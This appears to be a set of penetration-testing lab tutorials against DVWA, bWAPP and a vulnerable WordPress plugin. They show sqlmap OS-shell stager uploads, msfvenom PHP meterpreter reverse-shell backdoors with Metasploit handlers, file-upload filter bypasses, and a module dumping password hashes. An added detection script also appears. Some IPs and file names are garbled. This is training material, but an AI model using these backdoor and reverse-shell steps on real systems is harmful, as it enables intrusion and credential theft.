Meterpreter Shell Uploading in DVWA using SQL Injection

This article follows the same approach as the previous one; this time I will use sqlmap to upload a backdoor file to a DVWA installation that suffers from a SQL injection vulnerability.

Requirement:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp suite, sqlmap tool

First you need to install the DVWA lab in your XAMPP or WAMP server; read the full article here.

Now open DVWA on your PC and log in with the following credentials:

Username – admin

Password – password

Click on DVWA Security and set the website security level to low.

From the list of vulnerabilities select SQL Injection for your attack. Type User ID: 1 in the text box. Don't click the Submit button before configuring your browser proxy: point the browser at Burp's listener (127.0.0.1:8080 by default) so that Burp Suite can capture the request.

Turn on Burp Suite, click Proxy in the menu bar and make sure Intercept is on. Come back and click Submit in DVWA. The Intercept tab displays the HTTP and WebSocket messages that pass between your browser and the web server. In the captured request Burp shows the Cookie and Referer headers, which we will use later in the sqlmap commands.

In the following command sqlmap analyses the URL to establish a connection to the target and then, using the supplied cookies, injects SQL queries to enumerate all database names. The PHPSESSID must belong to a live session and security=low must be set, otherwise DVWA redirects every request to the login page and sqlmap finds nothing. Alternatively, save the raw request from Burp to a file and pass it with sqlmap -r, which picks up the URL, parameters and cookies automatically.

sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovma5q47; security_level=0" --dbs

As you can see in the image below, it has dumped all database names. Choose dvwa as the database to work with for uploading the PHP backdoor.

Now type the following command to run sqlmap and obtain an OS shell on the web server (dvwa):

sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47; security_level=0" -D dvwa --os-shell

sqlmap will try to upload a file stager; I want to create a PHP backdoor on the target, so type 4 for the PHP payload and then 4 for a brute-force search to find a writable directory to upload it to.

It tries to upload the file to "/xampp/htdocs/" using different SQL injection techniques (on MySQL this is a SELECT ... INTO OUTFILE, which only works when the database account has the FILE privilege and secure_file_priv does not forbid the target directory). As soon as the file is uploaded, sqlmap prints INFO the file stager has been successfully uploaded on "/xampp/htdocs/" and you get an os-shell on the victim machine. It also shows the URL of the stager, through which you can manually upload your own backdoor; look at the highlighted URL:

http://192.168.0.102/tmpunias.php

Open the URL http://192.168.0.102/tmpunais.php in your browser. From the screenshot you can read the heading of the web page, sqlmap file uploader, which lets you browse for a backdoor on your machine and then uploads it to the web server directory ("/xampp/htdocs/").

Let's prepare the malicious file to upload with msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw

Copy the output from <?php to die() and save it in a file with the .php extension. I have saved the backdoor as shell.php on the desktop and will later browse for this file to upload it to the web server.

Now start the Metasploit framework by typing msfconsole and set up multi/handler with the commands listed below, so that it is listening before the backdoor is triggered.

Click Browse to select your shell.php file and then click Upload.

GREAT!!! The page reports that the file is uploaded, which means the backdoor shell.php is now on the server.

To execute the backdoor on the target, open http://192.168.0.102/shell.php in the browser and you will receive a reverse connection at multi/handler.

msf > use multi/handler

msf exploit(handler) > set lport 4444

msf exploit(handler) > set lhost 192.168.0.104

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > exploit

meterpreter > sysinfo

Divine!!! A meterpreter session is opened.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast.

Shell Uploading through SQL Injection using Sqlmap in bWAPP

You have used sqlmap many times to extract the database of a web server through SQL injection. In this tutorial I will show you how to upload a backdoor when the website suffers from a SQL injection vulnerability.

Requirement:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, sqlmap tool

First you need to install the bWAPP lab in your XAMPP or WAMP server; read the full article here.

Let’s begin!!!

Start the Apache and MySQL services in XAMPP or WAMP. Open the localhost address in the browser; I am using 192.168.1.101:81/bWAPP/login.php. Enter bee as the user and bug as the password.

Set the security level to low, choose the bug SQL Injection (GET/Search) from the list box and click Hack.

Type any movie name, such as thor, in the text field and then start Burp Suite in Kali Linux.

To capture the bWAPP cookie, click the Proxy tab, make sure Intercept is on, come back to bWAPP and click Search. Burp Suite shows the Cookie and Referer headers in the captured request, which we will use in the sqlmap command.

Now type the following command to run sqlmap and obtain an OS shell on the web server:

sqlmap -u "http://192.168.0.102:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47; security_level=0" -D bwapp --os-shell

The command above will try to upload a file stager; I want to send a PHP backdoor to the target, so type 4 for the PHP payload and then 1 for common locations to use as the writable directory.

It now tries to upload the file to "C:/xampp/htdocs/" using different SQL injection techniques. As soon as the file is uploaded, sqlmap prints INFO the file stager has been successfully uploaded on "C:/xampp/htdocs/" and you get an os-shell on the victim machine. It also shows the path where you can manually upload your backdoor; look at the highlighted URL:

http://192.168.0.102/tmpuuddt.php

I am more interested in a meterpreter shell, so let's prepare the malicious file to upload with msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw

Copy the output from <?php to die() and save it in a file with the .php extension. I have saved the backdoor as shell.php on the desktop and will later browse for this file to upload it to the web server.

Now start the Metasploit framework by typing msfconsole and set up multi/handler with the commands listed below, so that it is listening before the backdoor is triggered.

Open the URL http://192.168.0.102/tmpuuddt.php in your browser. From the screenshot you can read the heading of the web page, sqlmap file uploader, which lets you browse for a backdoor on your machine and then uploads it to the web server directory ("C:/xampp/htdocs/").

Click Browse to select your shell.php file and then click Upload.

GREAT!!! Our backdoor shell.php is uploaded.

To execute the backdoor on the target, open http://192.168.0.102/shell.php in the browser and you will receive a reverse connection at multi/handler.

msf > use multi/handler

msf exploit(handler) > set lport 4444

msf exploit(handler) > set lhost 192.168.0.104

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > exploit

meterpreter > sysinfo

Lovely!!! I have my meterpreter session in Kali Linux.


WordPress Penetration Testing using Symposium Plugin SQL Injection

"WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy."

WordPress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL Injection in get_album_item.php parameter ‘size’. The issue is exploitable even if the plugin is deactivated.

The SQL injection allows (very easily) to retrieve all the database content, which includes users details and password hashes. An attacker may be able to crack users’ password hashes and log in as them. If an administrator user password is obtained, then the attacker could take complete control of the WordPress installation. Collected information may also allow further attacks. 

https://www.exploit-db.com/exploits/37824
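An added detection example, not part of the article or the advisory above: it scans constructed Apache access-log lines for requests to get_album_item.php whose size parameter carries SQL syntax instead of a plain value. The log lines, client addresses, timestamps and the injected values are constructed for this example; only the script name and the parameter name come from the advisory. The benign value thumb is likewise an assumption about what a legitimate request looks like.

```python
"""
Added example (not from the article or the advisory): detector for SQL
syntax in the size parameter of WP Symposium's get_album_item.php, run
over constructed access-log lines.  Hosts, times and values are made up.
"""
import re
from urllib.parse import parse_qs, unquote, urlparse

# Common Log Format: ip ident user [time] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Syntax a legitimate size value (a keyword or a number) never contains.
SQL_TOKENS = re.compile(r"\(|\)|;|'|\"|--|/\*|\b(select|union|from|where|sleep|version)\b", re.I)

# Constructed sample: one benign request, two injection attempts, one unrelated hit.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2015:10:01:02 +0000] "GET /wp-content/plugins/wp-symposium/get_album_item.php?size=thumb&id=3 HTTP/1.1" 200 5120
10.0.0.9 - - [12/Aug/2015:10:01:07 +0000] "GET /wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%3B HTTP/1.1" 200 64
10.0.0.9 - - [12/Aug/2015:10:01:09 +0000] "GET /wp-content/plugins/wp-symposium/get_album_item.php?size=user_pass%20from%20wp_users%3B HTTP/1.1" 200 210
10.0.0.7 - - [12/Aug/2015:10:02:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2300
"""


def is_symposium_sqli(target: str) -> bool:
    """True when the request targets get_album_item.php and its size
    parameter contains SQL syntax.  parse_qs already decodes %xx; the
    extra unquote() also catches double-encoded payloads."""
    u = urlparse(target)
    if not u.path.endswith("/wp-symposium/get_album_item.php"):
        return False
    for value in parse_qs(u.query, keep_blank_values=True).get("size", []):
        if SQL_TOKENS.search(unquote(value)):
            return True
    return False


def scan_log(text: str) -> list:
    """Return one record per suspicious request: source IP, time, target."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_symposium_sqli(m["target"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"]})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h)
```

Because the advisory notes that the script is reachable even when the plugin is deactivated, the path check alone (any request to get_album_item.php on a site that no longer uses the plugin) is already worth alerting on; the token check only separates probing from ordinary use.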

Attacker: Kali Linux

Target: WordPress

Let's start!!!!

Start WPScan in Kali and scan the target IP for a WordPress application with the following command; the p enumeration lists the plugins currently installed on the site:

./wpscan.rb --url http://192.1681.0.104 --enumerate p

The red marker indicates that WP Symposium 15.5.1 is vulnerable to an unauthenticated SQL injection, while the blue entry shows that the issue was fixed in version 15.8, which is not known to be vulnerable.

Now start Metasploit for the attack by typing msfconsole in a terminal in Kali Linux.

msf > use auxiliary/admin/http/wp_symposium_sql_injection

msf auxiliary(wp_symposium_sql_injection) > set rhost 192.1681.0.104

msf auxiliary(wp_symposium_sql_injection) > set rport 80

msf auxiliary(wp_symposium_sql_injection) > exploit

Nice!!! The module dumped the username and the password hash for the user raj.


Hack File Upload Vulnerability in DVWA (Bypass All Security)

File upload vulnerabilities are a major problem in web applications. Wherever an upload feature lets an attacker place a file containing malicious code on the server, that code can then be executed by the server. An attacker might use this to host a phishing page on the website or to deface it.

The attacker may also expose internal information about the web server to others, and sensitive data may end up accessible to unauthorized people.

In DVWA the page allows the user to upload an image. At the high security level the server-side code checks that the file name ends in '.jpg', '.jpeg' or '.png' (and that the content passes getimagesize()) before the file is stored in the upload directory; the medium level only checks the Content-Type the browser sends, and the low level checks nothing at all.

Requirement:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp suite, metasploit framework

Install the DVWA lab in your XAMPP or WAMP server; read the full article here.

Now open DVWA in your browser at your local IP, e.g. 192.168.1.102:81/DVWA, and log in with the following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set the website security level to low.

Open a terminal in Kali Linux and create a PHP backdoor with the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Copy and paste the highlighted code into Leafpad and save it with the PHP extension as hack.php on the desktop.

Come back to your DVWA lab and click the File Upload option in the vulnerability menu.

Now click Browse to select hack.php and click Upload, which stores the file in the upload directory of the server.

After the upload the page shows the directory path where your file was saved; copy the selected part and paste it into the URL to execute it.

hackable/uploads/hack.php

Before opening this URL in the browser, start multi/handler in the Metasploit framework using the commands below. While the handler is running, open the URL of the PHP file in the browser; this gives you meterpreter session 1.

192.168.1.102:81/DVWA/hackable/uploads/hack.php

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.104

msf exploit(handler) > set lport 3333

msf exploit(handler) > run

meterpreter > sysinfo

Bypass Medium Level Security

Click on DVWA Security and set the website security level to medium.

Create the PHP backdoor the same way:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Now save the selected code as raj.php.jpeg on the desktop. The medium level differs from low in that it validates the upload, but what it actually checks is the Content-Type header the browser sends (it must be image/jpeg or image/png) and the size, not the file name or contents. The browser chooses that header from the .jpeg extension, so the request passes the check, and the file name can then be changed in transit.

Come back to your DVWA lab and click the File Upload option in the vulnerability menu.

Again click Browse to select raj.php.jpeg. Now start Burp Suite and turn Intercept on under the Proxy tab. Don't forget to set your browser's manual proxy, then click Upload.

The Intercept tab catches the POST request when you click Upload. Now change the filename raj.php.jpeg to raj.php in the Content-Disposition header of the multipart body, leaving Content-Type: image/jpeg untouched.

Compare the request before and after the change. After altering it, click Forward to upload the PHP file to the directory.

The page shows the path of the uploaded file in the directory where it was saved.

hackable/uploads/raj.php

Now repeat the same process as for low security to execute the PHP file via its URL.

192.168.1.102:81/DVWA/hackable/uploads/raj.php

This gives you meterpreter session 2 when you open the URL in the browser.

meterpreter > sysinfo

Bypass High Level Security

Click on DVWA Security and set the website security level to high.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Now save the selected code as shell.jpeg on the desktop. The high level differs from low and medium in that it checks the file extension and also inspects the content with getimagesize(), so type a GIF signature before the PHP code (GIF98 in the screenshot; GIF89a is the genuine header of a real file) and save it as shell.jpeg.

Repeat the process to browse for shell.jpeg and upload it.

Again you get the directory path of the uploaded file.

This file cannot be executed directly from its URL because it was uploaded with a .jpeg extension, which the server treats as a static file. To rename it to a PHP file, click the Command Injection option in the vulnerability menu. This vulnerability lets you copy and rename shell.jpeg to a PHP file. Type the following in the text box; it copies shell.jpeg to aa.php:

|copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg C:\xampp\htdocs\DVWA\hackable\uploads\aa.php

When you submit the command, the PHP file is copied under the new name aa.php.

Now repeat the process to execute the PHP file via its URL.

192.168.1.102:81/DVWA/hackable/uploads/aa.php

Wonderful!! Here we get meterpreter session 3 as well.

meterpreter > sysinfo

